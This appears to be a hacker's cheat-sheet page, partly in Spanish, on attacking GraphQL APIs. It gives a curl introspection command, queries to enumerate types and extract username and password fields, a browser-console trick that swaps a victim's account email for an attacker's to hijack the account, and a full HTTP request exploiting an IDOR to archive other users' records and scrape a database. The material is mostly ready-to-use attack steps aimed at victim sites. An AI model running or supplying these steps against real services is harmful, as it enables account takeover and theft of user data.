GraphQL

#GraphQL

Basic Exploit

On GraphQL you can use some basic attacks, with POST & JSON, or use Burpsuite

curl -s {web}/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq .

You can copy the output and send it to the following website:

Exploring

If you found the name of a label, you can apply the following query, using as example "User" and field label named "name" with origin types

{ __type(name: "User") { name fields { name } } }

You can still go deeper.

{ user { username password } }

Otros casos

Secuestro de usuario

Puedes secuestrar a un usuario cambiando la informacion por consola via HTML, primero debes confirmar tu informacion en Inspeccionar > Consola

windows.RailsData.current_organization.business_email = "AttackerEmail"
windows.RailsData.user.email = "AttackerEmail"

Luego en un request interceptado por burp, al agregar miembros o al trabajar con correos, en POST lo cambias a la victima

Solicitud descargada desde FireFox

Un sitio deberia verificar esto, no deberia dejar utilizar la cuenta victima.

IDOR

En este caso un atacante pudo descargar la informacion de cada CODE, esto permite generar un script para descargar toda la base.

POST /graphql HTTP/2
Host: VICTIMA.com
Content-Length: 388
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: */*
X-Auth-Token: AUTHTOKEN
Content-Type: application/json
Origin: VICTIMA.com
Referer: VICTIMA.com/CODE/edit         // Era en el sitio de "edicion"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7

{"operationName":"NombreOperacion","variables":{"structured_scope_id":"HASH-relacionado a /code/edit"},"query":"mutation NombreOperacion($structured_scope_id: ID!) {\n  archiveStructuredScope(input: {structured_scope_id: $structured_scope_id}) {\n    was_successful\n    structured_scope {\n      id\n      archived_at\n      __typename\n    }\n    __typename\n  }\n}\n"}